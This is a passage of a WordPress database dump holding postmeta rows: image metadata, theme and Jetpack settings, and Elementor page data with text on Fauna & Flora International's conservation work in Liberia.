"height\";i:450;s:4:\"file\";s:16:\"2020/03/EPA2.jpg\";s:5:\"sizes\";a:3:{s:6:\"medium\";a:4:{s:4:\"file\";s:16:\"EPA2-300x135.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:135;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:16:\"EPA2-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:16:\"EPA2-768x346.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:346;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(20810,3038,'_elementor_controls_usage','a:0:{}'),(20813,3038,'_thumbnail_id','3039'),(20814,3038,'_edit_last','38'),(20815,3038,'ocean_gallery_link_images','off'),(20816,3038,'ocean_sidebar','0'),(20817,3038,'ocean_second_sidebar','0'),(20818,3038,'ocean_disable_margins','enable'),(20819,3038,'ocean_display_top_bar','default'),(20820,3038,'ocean_display_header','default'),(20821,3038,'ocean_center_header_left_menu','0'),(20822,3038,'ocean_custom_header_template','0'),(20823,3038,'ocean_header_custom_menu','0'),(20824,3038,'ocean_menu_typo_font_family','0'),(20825,3038,'ocean_disable_title','default'),(20826,3038,'ocean_disable_heading','default'),(20827,3038,'ocean_disable_breadcrumbs','default'),(20828,3038,'ocean_display_footer_widgets','default'),(20829,3038,'ocean_display_footer_bottom','default'),(20830,3038,'ocean_custom_footer_template','0'),(20831,3038,'ocean_link_format_target','self'),(20832,3038,'ocean_quote_format_link','post'),(20833,3038,'osh_disable_topbar_sticky','default'),(20834,3038,'osh_disable_header_sticky','default'),(20835,3038,'osh_sticky_header_style','default'),(20836,2161,'_jetpack_related_posts_cache','a:1:{s:32:\"a9259a0c5e423c2c0237356780aea305\";a:2:{s:7:\"expires\";i:1628112588;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:2150;}i:1;a:1:{s:2:\"id\";i:3263;}i:2;a:1:{s:2:\"id\";i:2751;}}}}'),(20837,2154,'_jetpack_related_posts_cache','a:1:{s:32:\"a9259a0c5e423c2c0237356780aea305\";a:2:{s:7:\"expires\";i:1627943992;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:2751;}i:1;a:1:{s:2:\"id\";i:3099;}i:2;a:1:{s:2:\"id\";i:2178;}}}}'),(20838,2152,'_jetpack_related_posts_cache','a:1:{s:32:\"a9259a0c5e423c2c0237356780aea305\";a:2:{s:7:\"expires\";i:1626504034;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:1722;}i:1;a:1:{s:2:\"id\";i:2991;}i:2;a:1:{s:2:\"id\";i:2248;}}}}'),(20839,2148,'_jetpack_related_posts_cache','a:1:{s:32:\"a9259a0c5e423c2c0237356780aea305\";a:2:{s:7:\"expires\";i:1627844117;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:1728;}i:1;a:1:{s:2:\"id\";i:1734;}i:2;a:1:{s:2:\"id\";i:1722;}}}}'),(20840,2063,'_jetpack_related_posts_cache','a:1:{s:32:\"a9259a0c5e423c2c0237356780aea305\";a:2:{s:7:\"expires\";i:1627089217;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:3263;}i:1;a:1:{s:2:\"id\";i:3099;}i:2;a:1:{s:2:\"id\";i:3243;}}}}'),(20841,2775,'_jetpack_related_posts_cache','a:1:{s:32:\"d65876263e6f4c3fb6c0fd6f49c644ce\";a:2:{s:7:\"expires\";i:1628779082;s:7:\"payload\";a:2:{i:0;a:1:{s:2:\"id\";i:2617;}i:1;a:1:{s:2:\"id\";i:2558;}}}}'),(20842,3041,'_vc_post_settings','s:30:\"a:1:{s:10:\"vc_grid_id\";a:0:{}}\";'),(20843,3041,'_vc_post_settings','s:30:\"a:1:{s:10:\"vc_grid_id\";a:0:{}}\";'),(20844,3041,'slide_template','default'),(20845,3041,'slide_template','default'),(20846,3041,'_elementor_template_type','wp-post'),(20847,3041,'_elementor_template_type','wp-post'),(20848,3041,'_elementor_version','2.8.1'),(20849,3041,'_elementor_version','2.8.1'),(20850,3041,'_wp_page_template','default'),(20851,3041,'_wp_page_template','default'),(20852,3041,'_elementor_data','[{\"id\":\"7bf16f53\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"df1efc1\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"76cad43e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"a3e5fad\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Fauna &amp; Flora International (FFI) began working in Liberia in 1997 and we played a crucial role, together with our partners, in re-establishing operations in the country\\u2019s oldest protected area \\u2013 Sapo National Park \\u2013 after years of civil conflict.<\\/p><p>Drawing on this work in Sapo, we have since worked closely with our partners to help identify and prioritise sites for a protected area network across Liberia and establish the foundations for sustainable forest and environmental management.<\\/p><p>We are also working extensively to improve collaboration between local, national, regional and private stakeholders across various sectors and national boundaries to reduce threats to biodiversity from subsistence pressures, oil palm operations and large-scale mining operations.<\\/p><p>Recognising the value of Liberian forests for carbon storage, biodiversity conservation and community well-being, we are also playing a lead role in the development of REDD+ project sites in the country.<\\/p><p>Community involvement in decision making is central to strengthening forest management and governance in a post-conflict Liberia, and we have supported a range of activities to ensure that communities within and surrounding East Nimba Nature Reserve, Wonegizi and Wologizi Proposed Protected Areas, and Sapo National Park are properly supported to engage in protected area management and conservation.<\\/p><p>FFI is also supporting Liberia\\u2019s up-and-coming conservationists by helping to build conservation capacity at a national level \\u2013 something that is currently limited due to a lack of practical and academic training opportunities. FFI is tackling these challenges by developing appropriate infrastructure and training courses, including university-level teaching as well as practical skills training such as biomonitoring, and conservation management skills such as proposal writing and grant management.<\\/p>\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":14,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f9a4752\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"602e7b89\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"5a027f71\",\"elType\":\"widget\",\"settings\":{\"title\":\"Featured Projects \",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"100\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"ee507b0\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"\",\"id\":\"\"},\"image_size\":\"medium\",\"caption\":\"Water, sanitation and hygiene\",\"link\":{\"url\":\"www.habitat.org\",\"is_external\":\"on\",\"nofollow\":\"\"}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"f156dc7\",\"elType\":\"widget\",\"settings\":{\"featured_post\":\"\",\"featured_excerpt_trimmed_ending\":\"...\",\"featured_read_more_text\":\"Read More\",\"posts_columns\":\"3\",\"image_size\":\"full\",\"image_position\":\"top\",\"excerpt_length\":20,\"excerpt_trimmed_ending\":\"...\",\"read_more\":\"yes\",\"read_more_text\":\"Read More\",\"show_meta\":\"\",\"show_terms_tax\":\"resource_tag\",\"use_custom_query\":\"true\",\"custom_query\":\"{\\\"post_type\\\":\\\"project_resource\\\",\\\"order\\\":\\\"ASC\\\",\\\"orderby\\\":\\\"date\\\",\\\"posts_per_page\\\":\\\"3\\\",\\\"tag\\\":\\\"ffi\\\",\\\"tag_id\\\":\\\"54\\\",\\\"tax_query\\\":{\\\"0\\\":{\\\"taxonomy\\\":\\\"resource_tag\\\",\\\"field\\\":\\\"slug\\\",\\\"terms\\\":[\\\"ffi\\\"],\\\"operator\\\":\\\"IN\\\"},\\\"relation\\\":\\\"OR\\\"}}\",\"post_type\":\"project_resource\",\"all_btn_label\":\"All\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c0fd7af\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c9198db\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"post_title_color\":\"#000000\",\"post_title_typography_typography\":\"custom\",\"post_title_typography_font_weight\":\"600\",\"post_text_color\":\"#7a7a7a\",\"post_text_typography_typography\":\"custom\",\"post_text_typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]},\"post_button_bg_color\":\"#006400\",\"post_button_hover_bg_color\":\"#014421\",\"arrows_style_popover_toggle\":\"custom\"},\"elements\":[],\"widgetType\":\"jet-blog-smart-listing\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"58a3e8b9\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"615c3465\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"6bc66929\",\"elType\":\"widget\",\"settings\":{\"title\":\"Related Documents\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"100\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"581f0bca\",\"elType\":\"widget\",\"settings\":{\"shortcode\":\"[posts_table post_type=\\\"document\\\" \\ncolumns=\\\"id,title,\\nexcerpt,cf:download_link,\\ntax:resource_category:Categories,\\n\\\" width=\\\"auto,250px,400px,auto,auto,auto\\\" term=\\\"resource_tag:ffi\\\" page_length=\\\"false\\\"]\"},\"elements\":[],\"widgetType\":\"shortcode\"}],\"isInner\":false}],\"isInner\":false}]'),(20853,3041,'_elementor_data','[{\"id\":\"7bf16f53\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"df1efc1\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"76cad43e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"a3e5fad\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Fauna &amp; Flora International (FFI) began working in Liberia in 1997 and we played a crucial role, together with our partners, in re-establishing operations in the country\\u2019s oldest protected area \\u2013 Sapo National Park \\u2013 after years of civil conflict.<\\/p><p>Drawing on this work in Sapo, we have since worked closely with our partners to help identify and prioritise sites for a protected area network across Liberia and establish the foundations for sustainable forest and environmental management.<\\/p><p>We are also working extensively to improve collaboration between local, national, regional and private stakeholders across various sectors and national boundaries to reduce threats to biodiversity from subsistence pressures, oil palm operations and large-scale mining operations.<\\/p><p>Recognising the value of Liberian forests for carbon storage, biodiversity conservation and community well-being, we are also playing a lead role in the development of REDD+ project sites in the country.<\\/p><p>Community involvement in decision making is central to strengthening forest management and governance in a post-conflict Liberia, and we have supported a range of activities to ensure that communities within and surrounding East Nimba Nature Reserve, Wonegizi and Wologizi Proposed Protected Areas, and Sapo National Park are properly supported to engage in protected area management and conservation.<\\/p><p>FFI is also supporting Liberia\\u2019s up-and-coming conservationists by helping to build conservation capacity at a national level \\u2013 something that is currently limited due to a lack of practical and academic training opportunities. FFI is tackling these challenges by developing appropriate infrastructure and training courses, including university-level teaching as well as practical skills training such as biomonitoring, and conservation management skills such as proposal writing and grant management.<\\/p>\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":14,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f9a4752\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"602e7b89\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"5a027f71\",\"elType\":\"widget\",\"settings\":{\"title\":\"Featured Projects \",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"100\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"ee507b0\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"\",\"id\":\"\"},\"image_size\":\"medium\",\"caption\":\"Water, sanitation and hygiene\",\"link\":{\"url\":\"www.habitat.org\",\"is_external\":\"on\",\"nofollow\":\"\"}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"f156dc7\",\"elType\":\"widget\",\"settings\":{\"featured_post\":\"\",\"featured_excerpt_trimmed_ending\":\"...\",\"featured_read_more_text\":\"Read More\",\"posts_columns\":\"3\",\"image_size\":\"full\",\"image_position\":\"top\",\"excerpt_length\":20,\"excerpt_trimmed_ending\":\"...\",\"read_more\":\"yes\",\"read_more_text\":\"Read More\",\"show_meta\":\"\",\"show_terms_tax\":\"resource_tag\",\"use_custom_query\":\"true\",\"custom_query\":\"{\\\"post_type\\\":\\\"project_resource\\\",\\\"order\\\":\\\"ASC\\\",\\\"orderby\\\":\\\"date\\\",\\\"posts_per_page\\\":\\\"3\\\",\\\"tag\\\":\\\"ffi\\\",\\\"tag_id\\\":\\\"54\\\",\\\"tax_query\\\":{\\\"0\\\":{\\\"taxonomy\\\":\\\"resource_tag\\\",\\\"field\\\":\\\"slug\\\",\\\"terms\\\":[\\\"ffi\\\"],\\\"operator\\\":\\\"IN\\\"},\\\"relation\\\":\\\"OR\\\"}}\",\"post_type\":\"project_resource\",\"all_btn_label\":\"All\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c0fd7af\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c9198db\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"post_title_color\":\"#000000\",\"post_title_typography_typography\":\"custom\",\"post_title_typography_font_weight\":\"600\",\"post_text_color\":\"#7a7a7a\",\"post_text_typography_typography\":\"custom\",\"post_text_typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]},\"post_button_bg_color\":\"#006400\",\"post_button_hover_bg_color\":\"#014421\",\"arrows_style_popover_toggle\":\"custom\"},\"elements\":[],\"widgetType\":\"jet-blog-smart-listing\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"58a3e8b9\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"615c3465\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"6bc66929\",\"elType\":\"widget\",\"settings\":{\"title\":\"Related Documents\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"100\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"581f0bca\",\"elType\":\"widget\",\"settings\":{\"shortcode\":\"[posts_table post_type=\\\"document\\\" \\ncolumns=\\\"id,title,\\nexcerpt,cf:download_link,\\ntax:resource_category:Categories,\\n\\\" width=\\\"auto,250px,400px,auto,auto,auto\\\" term=\\\"resource_tag:ffi\\\" page_length=\\\"false\\\"]\"},\"elements\":[],\"widgetType\":\"shortcode\"}],\"isInner\":false}],\"isInner\":false}]'),(20856,3041,'_elementor_controls_usage','a:6:{s:11:\"text-editor\";a:3:{s:5:\"count\";i:1;s:15:\"control_percent\";i:1;s:8:\"controls\";a:2:{s:7:\"content\";a:1:{s:14:\"section_editor\";a:1:{s:6:\"editor\";i:1;}}s:5:\"style\";a:1:{s:13:\"section_style\";a:3:{s:10:\"text_color\";i:1;s:21:\"typography_typography\";i:1;s:20:\"typography_font_size\";i:1;}}}}s:6:\"column\";a:3:{s:5:\"count\";i:3;s:15:\"control_percent\";i:0;s:8:\"controls\";a:0:{}}s:7:\"section\";a:3:{s:5:\"count\";i:3;s:15:\"control_percent\";i:0;s:8:\"controls\";a:1:{s:6:\"layout\";a:1:{s:16:\"section_parallax\";a:1:{s:24:\"jet_parallax_layout_list\";i:3;}}}}s:7:\"heading\";a:3:{s:5:\"count\";i:2;s:15:\"control_percent\";i:2;s:8:\"controls\";a:2:{s:7:\"content\";a:1:{s:13:\"section_title\";a:1:{s:5:\"title\";i:2;}}s:5:\"style\";a:1:{s:19:\"section_title_style\";a:5:{s:11:\"title_color\";i:2;s:21:\"typography_typography\";i:2;s:22:\"typography_font_family\";i:2;s:20:\"typography_font_size\";i:2;s:22:\"typography_font_weight\";i:2;}}}}s:5:\"image\";a:3:{s:5:\"count\";i:1;s:15:\"control_percent\";i:1;s:8:\"controls\";a:1:{s:7:\"content\";a:1:{s:13:\"section_image\";a:4:{s:5:\"image\";i:1;s:10:\"image_size\";i:1;s:7:\"caption\";i:1;s:4:\"link\";i:1;}}}}s:9:\"shortcode\";a:3:{s:5:\"count\";i:1;s:15:\"control_percent\";i:0;s:8:\"controls\";a:1:{s:7:\"content\";a:1:{s:17:\"section_shortcode\";a:1:{s:9:\"shortcode\";i:1;}}}}}'),(20858,3041,'_dp_original','2964'),(20859,3041,'_edit_lock','1663166067:42'),(20860,3041,'_edit_last','42'),(20863,1778,'_jetpack_related_posts_cache','a:1:{s:32:\"a9259a0c5e423c2c0237356780aea305\";a:2:{s:7:\"expires\";i:1628894473;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:3275;}i:1;a:1:{s:2:\"id\";i:1780;}i:2;a:1:{s:2:\"id\";i:3257;}}}}'),(20864,3041,'_jetpack_related_posts_cache','a:1:{s:32:\"387e53bc056fb081449b6ed79a90f200\";a:2:{s:7:\"expires\";i:1627597873;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:1606;}i:1;a:1:{s:2:\"id\";i:2964;}i:2;a:1:{s:2:\"id\";i:1584;}}}}'),(20865,1703,'_jetpack_related_posts_cache','a:1:{s:32:\"a9259a0c5e423c2c0237356780aea305\";a:2:{s:7:\"expires\";i:1628040781;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:3099;}i:1;a:1:{s:2:\"id\";i:3096;}i:2;a:1:{s:2:\"id\";i:1766;}}}}'),(20866,1724,'_jetpack_related_posts_cache','a:1:{s:32:\"a9259a0c5e423c2c0237356780aea305\";a:2:{s:7:\"expires\";i:1628895912;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:1711;}i:1;a:1:{s:2:\"id\";i:2989;}i:2;a:1:{s:2:\"id\";i:1743;}}}}'),(20867,3045,'_jetpack_related_posts_cache','a:1:{s:32:\"8f6677c9d6b0f903e98ad32ec61f8deb\";a:2:{s:7:\"expires\";i:1628549715;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:3023;}i:1;a:1:{s:2:\"id\";i:3069;}i:2;a:1:{s:2:\"id\";i:3038;}}}}'),(20868,3045,'_edit_lock','1584614258:38'),(20869,3046,'_wp_attached_file','2020/03/Cross-section-of-Participants-at-the-Stakeholders-review.jpg'),(20870,3046,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:500;s:6:\"height\";i:375;s:4:\"file\";s:68:\"2020/03/Cross-section-of-Participants-at-the-Stakeholders-review.jpg\";s:5:\"sizes\";a:2:{s:6:\"medium\";a:4:{s:4:\"file\";s:68:\"Cross-section-of-Participants-at-the-Stakeholders-review-300x225.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:225;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:68:\"Cross-section-of-Participants-at-the-Stakeholders-review-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(20871,3045,'_elementor_controls_usage','a:0:{}'),(20874,3045,'_thumbnail_id','3046'),(20875,3045,'_edit_last','38'),(20876,3045,'ocean_gallery_link_images','off'),(20877,3045,'ocean_sidebar','0'),(20878,3045,'ocean_second_sidebar','0'),(20879,3045,'ocean_disable_margins','enable'),(20880,3045,'ocean_display_top_bar','default'),(20881,3045,'ocean_display_header','default'),(20882,3045,'ocean_center_header_left_menu','0'),(20883,3045,'ocean_custom_header_template','0'),(20884,3045,'ocean_header_custom_menu','0'),(20885,3045,'ocean_menu_typo_font_family','0'),(20886,3045,'ocean_disable_title','default'),(20887,3045,'ocean_disable_heading','default'),(20888,3045,'ocean_disable_breadcrumbs','default'),(20889,3045,'ocean_display_footer_widgets','default'),(20890,3045,'ocean_display_footer_bottom','default'),(20891,3045,'ocean_custom_footer_template','0'),(20892,3045,'ocean_link_format_target','self'),(20893,3045,'ocean_quote_format_link','post'),(20894,3045,'osh_disable_topbar_sticky','default'),(20895,3045,'osh_disable_header_sticky','default'),(20896,3045,'osh_sticky_header_style','default'),(20897,1780,'_jetpack_related_posts_cache','a:1:{s:32:\"a9259a0c5e423c2c0237356780aea305\";a:2:{s:7:\"expires\";i:1628709931;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:3249;}i:1;a:1:{s:2:\"id\";i:3257;}i:2;a:1:{s:2:\"id\";i:3243;}}}}'),(20898,1734,'_jetpack_related_posts_cache','a:1:{s:32:\"a9259a0c5e423c2c0237356780aea305\";a:2:{s:7:\"expires\";i:1628620283;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:2297;}i:1;a:1:{s:2:\"id\";i:3096;}i:2;a:1:{s:2:\"id\";i:3107;}}}}'),(20899,1739,'_jetpack_related_posts_cache','a:1:{s:32:\"a9259a0c5e423c2c0237356780aea305\";a:2:{s:7:\"expires\";i:1628248769;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:1737;}i:1;a:1:{s:2:\"id\";i:1715;}i:2;a:1:{s:2:\"id\";i:1722;}}}}'),(20900,1707,'_jetpack_related_posts_cache','a:1:{s:32:\"a9259a0c5e423c2c0237356780aea305\";a:2:{s:7:\"expires\";i:1628217630;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:1699;}i:1;a:1:{s:2:\"id\";i:1697;}i:2;a:1:{s:2:\"id\";i:1705;}}}}'),(20901,2156,'_jetpack_related_posts_cache','a:1:{s:32:\"a9259a0c5e423c2c0237356780aea305\";a:2:{s:7:\"expires\";i:1628370311;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:2063;}i:1;a:1:{s:2:\"id\";i:2161;}i:2;a:1:{s:2:\"id\";i:3249;}}}}'),(20902,1770,'_jetpack_related_posts_cache','a:1:{s:32:\"a9259a0c5e423c2c0237356780aea305\";a:2:{s:7:\"expires\";i:1627594303;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:1745;}i:1;a:1:{s:2:\"id\";i:1766;}i:2;a:1:{s:2:\"id\";i:1772;}}}}'),(20903,1768,'_jetpack_related_posts_cache','a:1:{s:32:\"a9259a0c5e423c2c0237356780aea305\";a:2:{s:7:\"expires\";i:1625637104;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:3104;}i:1;a:1:{s:2:\"id\";i:3109;}i:2;a:1:{s:2:\"id\";i:3099;}}}}'),(20904,3051,'_edit_lock','1629376812:42'),(20905,3051,'_edit_last','42'),(20906,3051,'_elementor_controls_usage','a:0:{}'),(20907,3051,'_jetpack_related_posts_cache','a:1:{s:32:\"e10a3b1fd740b2839c10bb96f2e48dff\";a:2:{s:7:\"expires\";i:1627941813;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:3180;}i:1;a:1:{s:2:\"id\";i:3175;}i:2;a:1:{s:2:\"id\";i:3704;}}}}'),(20908,3053,'_edit_lock','1629376730:42'),(20909,3053,'_edit_last','42'),(20910,3053,'_elementor_controls_usage','a:0:{}'),(20911,3053,'_jetpack_related_posts_cache','a:1:{s:32:\"e10a3b1fd740b2839c10bb96f2e48dff\";a:2:{s:7:\"expires\";i:1626648688;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:3704;}i:1;a:1:{s:2:\"id\";i:3178;}i:2;a:1:{s:2:\"id\";i:3181;}}